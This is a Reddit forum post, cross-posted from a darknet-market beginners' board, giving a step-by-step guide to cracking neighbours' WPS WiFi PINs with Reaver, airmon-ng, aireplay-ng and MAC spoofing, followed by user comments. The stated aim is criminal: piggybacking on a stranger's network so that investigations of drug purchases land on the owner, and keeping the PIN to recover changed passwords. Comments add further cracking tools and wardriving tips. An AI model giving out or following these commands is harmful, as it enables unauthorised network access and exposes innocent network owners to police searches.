Guide to Cracking WPS WiFi using Reaver. (xpost /r/dnmnoobs)

For all of you out there looking to really step up your OpSec here is a great way to do so. By piggy backing off of someone elses IP (and spoofing your MAC address while using their internet makes you completely anonymous whil browsing online. If for some reason your IP was leaked while using Tor and piggybacking off of someones network would lead the investigation directly to them (who would be able to claim 100% ignorance).

I would also like to add that since making this guide someone pointed out to me that FrankenScript does the same thing without having to know all of the codes and technical details. However I have not been able to successful attack using it.

Using my methods below I have cracked a few pins with the average time taking about 14 - 15 hours.

Any comments, critisisms, and questions welcome.

DISCLAIMER: The information I'm providing in this tutorial could be used for illegal activity. Please only use this for lawful purposes (yeah right, like none of us break the law here) and I am in no way responsible if you are somehow caught breaking the law.

Lingo / basic terminal commands:

AP = Access point, the network we are trying to test

Ctrl + C = stop action in terminal.

Now onto the fun.

If you were able to set up the following mostly on your own, this tutorial will be well within your skill sets / fairly easy to learn:

You will need the following items to start this process:

Once you have all of that we can go through the proccess of burning the Kali ISO to a Disc (or straight to a USB if you like). After installing from to the Disc I booted into Kali and used the installer included with Kali to install it on my 16gb USB drive. I then booted from my USB and made sure my USB wireless card was plugged in before booting (not required but your wireless card might be called something different than mine). This is a guide for Reaver so I'm not going into details of how to install Kali on a Disc / DVD it is almost exactly the same as Tails.

Kali Installation Guides:

Once booted into Kali we can start looking through the wireless activity around us.

Finding an AP to attack

Open a new terminal window and type the following command to list all of your wireless devices:

ifconfig

command

Output, I will be using "wlan0" for this Tutorial

Identifiy your wireless card from the list above, mine was wlan0, If yours is named something else put it in place of mine for this tutorial.

then put your wireless card into monitor mode with the command:

airmon-ng start wlan0

Command

Output

If any processes are found that could cause trouble you can kill them with the kill command (hitting enter after each line) like so:

kill 1028
kill 1174
kill 1419
kill 1418

command / output

For the kill lines if you get two processes that are numbered one after the other (1418 & 1419) kill the higher numbered one first (1419) other wise it will give you an error when trying to kill the second one.

Also please note your network card will change name when entering monitor mode. Mine is called "wlan0mon" now yours will be something similar.

After getting this ready we can find a network to "test." Use the following command to list all networks around you that have a WPS router that we can crack.

wash -i wlan0mon

Command

Output

This will list all of the vulnerable networks in your area, I have quite a few. Find a network with good power and make sure that the listing in the colum that reads "WPS Locked" says "No". If it says "Yes" in that colum our attack will not work. Take note of the networks BSSID and Channel number.

After identifying the AP we are testing you can go ahead and press Ctrl + C to stop the function. Take note of the BSSID and the Ch number we can get the info we need to perform our attack incognito.

Monitor just this network by using the command:

airodump-ng -c <ch #>  --bssid <AP's bssid> wlan0mon

-c = channel number

--bssid = BSSID of target AP - you can use copy and paste to paste the BSSID in place

Command

Output

The lower set of numbers (BSSID and Station, We will refer to them as BSSID and AP-Station from here on out) are the numbers we need for the rest of this attack. That lower line of info will only show up if a device is connected to the router of the network. After getting this info you can go ahead and stop the function (Ctrl + C).

Now we will spoof our MAC for the attack. (This is optional but I do it to cover all my tracks)

go ahead and stop your monitor mode using this command:

airmon-ng stop wlan0mon

Command

Output

And then use this command to take your wireless device offline to change the MAC (wireless device interface has dropped the "mon" because we took it out of monitor mode):

ifconfig wlan0 down

Command

Then change the MAC address for it using the "macchanger" command:

macchanger -m <AP Station> wlan0

Command

Output

Then issue this command to bring the Wireless device back up:

ifconfig wlan0 up

Command

Then we will start monitor mode again on our wireless device again because we need to be in monitor mode for the attack.

airmon-ng start wlan0

Command

Output

by running "ifconfig" on wlan0mon we can see the MAC spoofing we just did on wlan0 did not carry over to our virtual wireless monitor device:

ifconfig wlan0mon

Command

So we need to spoof our virtual monitor device's MAC now, same as before:

ifconfig wlan0mon down

Command

Use the "macchanger" command again using the "AP Station" from our target network as our new MAC (note: All MAC addresses must match when using the reaver attack - so if spoofed they all need to be the same):

macchanger -m <AP Station> wlan0mon

Command

Output

and then we are going to bring the monitor device back up:

ifconfig wlan0mon up

Command

Now our MAC is spoofed we are ready to beginn our attack. In two seperate terminal windows prepare the following commands:

reaver -i wlan0mon -b <bssid of target> -c 6 -N -d 8 -S -L -t 10 -r 3:30 --mac=<AP Station> -vv -A

Break down of what the options mean in reaver:

-c = Channel # of AP -N = No Nacks -d = delay after each pin attempt in seconds -S = dh-Small -t = time out time in seconds -L = ignore locks from AP -r X:Y = reoccuring rest, every X pin attempts rest Y seconds --mac= = spoof MAC address of where attack is coming from. THIS MUST MATCH THE MAC's YOU SPOOFED EARLIER known as <AP Station> -vv = very verbose, gives you details about what is happening -A = do not associate, telling reaver we will associate using another application.

There are more options in reaver, use this command to get a full list:

reaver --help

The second command to prep in a new terminal window is:

aireplay-ng -1 60 -a <BSSID> -h <AP Station> wlan0mon

breakdown of options for "aireplay"

-1 = associate repitition set in seconds (i.e re assosciate ever 60 seconds in my example) -a = target BSSID -h = MAC address that association is coming from (must be same as the MAC's we have spoofed previously, AKA <AP Station>

Command line preped for both Reaver and Aireplay

before we start these we need to open another new terminal window and run "airodump-ng" to make sure the "aireplay-ng" command is looking for the AP on the correct channel:

airodump-ng -c <ch #> --bssid <BSSID> wlan0mon

Command

Output

Once we have that running we can run our "aireplay-ng" command (leave "airodump-ng" running in the background) run the command we preped previously:

aireplay-ng -1 60 -a <BSSID> -h <AP Station> wlan0mon

Output

After a "Association Successful :-)" you can go ahead and stop the "Airodump-ng" command (Ctrl + C):

Output

Now that we are associated we can start the reaver attack. Go ahead and enter that command for reaver we prepped earlier:

reaver -i wlan0mon  -b <bssid of target> -c <ch #> -N -d 8 -S -L -t 10 -r 3:30 --mac=<AP Station> -vv -A

This is where things get dicy. If you have made it this far you have done most of the work but each individual router is particular about the settings it needs to successfuly enter a pin over and over.

here is a succesfully entered pin:

Sucessful pin attempt

There can be a lot of errors when trying to crack pins like this and this method can take between 4 hrs and 4 days. The first time I sucessfuly cracked a pin it took me roughly 14 hours.

If you do run into errors feel free to post them here and I will do my best to help or (better bet) google the error and you will probably find a solution, that is how I did all of my trouble shooting.

If reaver keeps giving you errors try different mixtures of delays and rest periods. Most routers don't like a source constantly trying pins and sending info like this so small breaks inbetween sets of pin attempts helps the router not freak out.

When cracking a WPS network with MAC spoofing on like this you will not get a password at the end of this cracking method. It will end and give you a WPS pin number (Store This Number!!). What you do with this is reset all of your MAC spoofing (unplug and plug back in your USB device) and then run the reaver attack again using the "-p" option with the pin number. So if reaver cracked the pin for you and it was "12345670" you would use this command (after resetting your MACs) to reveal the password:

reaver -i wlan0mon  -b <bssid of target> -c <ch #> -b <BSSID> -N -L -d 8 -p 12345670 -vv -A

You also have to run the association application again while doing this:

aireplay-ng -1 60 -a <BSSID> wlan0mon

I forgot to take a screenshot from the last time I cracked a WiFi but here is what a fully complete reaver screen looks like with a password shown:

complete pin with password

The WPS PSK is the password to the network for when you want to log in.

The WPS pin is super useful if the owner of the AP ever notices us stealing their interwebs and changes their password we can run reaver with this pin again and it will instantly spit us out the new password. So store these two pieces of info in a safe place.

Now we have the password so all that is left is to boot into tails, Spoof all of our MAC addresses (this option can be found in "more options" at the start menu), and log into the freshly cracked network.

I think this covers most of the basics of using reaver. Please feel free to comment with any questions, critisisms, or tips. If someone is interested I can post a quick guide to booting FrankenScript and using it, but again I have had more success with this method.

Enjoy guys and fuck CISA!


Comments


[44 Points] None:

If you use Kali linux, there is a GUI tool called Fern-Wifi-Cracker and it's literally all point and click. Wifite is an automated version of Reaver.

Kali runs on a livecd/usb just like TAILS, so it's easy to boot up, crack your neighbors password, and reboot into your regular install.

Edit: You can download Kali for free here. The wordlists (needed for Fern) are located in /usr/share/wordlists when you boot into it.


[18 Points] SolidSemen:

Thing is

the wifi i'm cracking has a WPS lockout after 3 attempts

rip


[17 Points] SlothropAnAbreaction:

Wow, thanks for the hard work, man, this is a great write up!


[9 Points] rebel101150:

Guide is appreciated but it's lost it's uses in the past year or two. Many routers have built in security functions to lock down the router for so long and it will tell you it can't try any more pins due to wps being locked. This just does not work anymore with a majority of them, I think I went around 5 years without paying for internet thanks to reaver and kali.


[9 Points] got_pwnt:

all this work....when cracking WPA2 is easier and quicker most of the time. learn to cloud crack, you're just gonna get locked out trying this shit. besides pixiewps is a better exploit.


[6 Points] kkkramer:

It's important to say that you should not do this to just your next door neighbor's house and expect any protection from the law. They will very quickly be able to connect the dots that grandma was not ordering drugs and maybe the nerdy guy next door hacked into her wireless. It's been done before.

You'd want to do some wardriving and find a good place to sit while you do your business if you truly want to be anonymous.


[7 Points] reddit_lurker242:

You do realize that Kali Linux does this with an automated program?

There is no point to following these instructions. I respect you for taking the time to write this though.


[5 Points] Sir_Blunt:

OP you're a noob. This technique is years old and hardly worked back then let alone now.


[4 Points] octomarvel:

Dude. You're doing gods work.

I wish I had 4 hands so I could give this 4 thumbs up.

=)


[2 Points] None:

Great tutorial, but if the fuzz would go so far as to question the owner of the wifi over an IP leak - what's stopping them from checking surrounding homes considering WiFi's short range?


[1 Points] Sniperman:

Awesome dude, i love cracking wep and inputing all those cmds and the output screen made me look like a 1337 hacker in front of my buddies, def gonna give this a go, tysir.


[2 Points] druggieslut:

Come on, the majority of people here barely even know how to use a computer.


[2 Points] PhriskyDingough:

Did you guys know that if you super glue a thin piece of thread to a dolar bill and put it in a vending machine, you can buy a coke, and pull the dollar back out with the string? Seriously.... it's been the same scam since like 1975.


[2 Points] MO_Drugs:

so iread this;

If you were able to set up the following mostly on your own, this tutorial will be well within your skill sets / fairly easy to learn: Tails PGP Tor

and i says Kewl!

then i keep reading

and i says op is high.


[1 Points] JackJackSplat:

Very useful, Thanks.


[1 Points] None:

[deleted]


[1 Points] sapiophile:

Really nice guide, thanks a ton for posting this.

/u/changetip 8mbtc


[1 Points] None:

[deleted]


[1 Points] TotesMessenger:

I'm a bot, bleep, bloop. Someone has linked to this thread from another place on reddit:

If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads. (Info / Contact)


[1 Points] Bewgs:

Am I the only one here that sees no link or text in this post?


[1 Points] Luxtaposition:

So, this is cool. However, how can i strengthen my Wi-Fi security from the likes of my fellow Redditors?


[1 Points] steggun_cinargo:

I remember with backtrack 3 I could get into wps in 20 minutes or less. Backtrack 5 could get wpa and wpa2 overnight but then I ran into routers locking me out. Haven't needed to worry about it since so it's nice to see where things are these days.


[1 Points] None:

[deleted]


[1 Points] Clix828:

[deleted]

What is this?


[1 Points] deguppyusel:

I personally don't think it's "great" opsec to piggypack on neighbor's wifi. Make sure your MAC address doesn't get logged while doing this, this could fuck you. Also, for the newbs out there who don't understand this whole post, there is an easier method you might try. It is certainly not how I go about cracking wifi but check out AirPCAP Packet Injection adapters, they are able to be used with the GUI wifi hacking tool Cain & Abel.

AirPCAP TX Adapter

Cracking WEP/WPA with Cain and Abel with AirPcap


[1 Points] bigcamel44:

good write up. i think lifehacker had this posted a few years ago.


[1 Points] islandMarket:

There is a much better way using reaver which cracks the SHA in minutes. Pixiewps.


[1 Points] None:

I love Kali. I learned to do some cool stuff on Kali back in the day (like a year ago lol). Very nice guide :)


[1 Points] ASAP_Archi:

Is there any benefit to using a live boot or mounted OS? I'm just using a Virtual Machine and yeah it's slow but surely the constraint is not my computational power with this type of attack. Am I wrong?


[1 Points] The_Madhouse:

I highly recommend back box linux over kali


[-1 Points] None:

[deleted]


[-6 Points] verbify:

So, your neighbour's house or mail gets searched? Thanks a lot, asshole.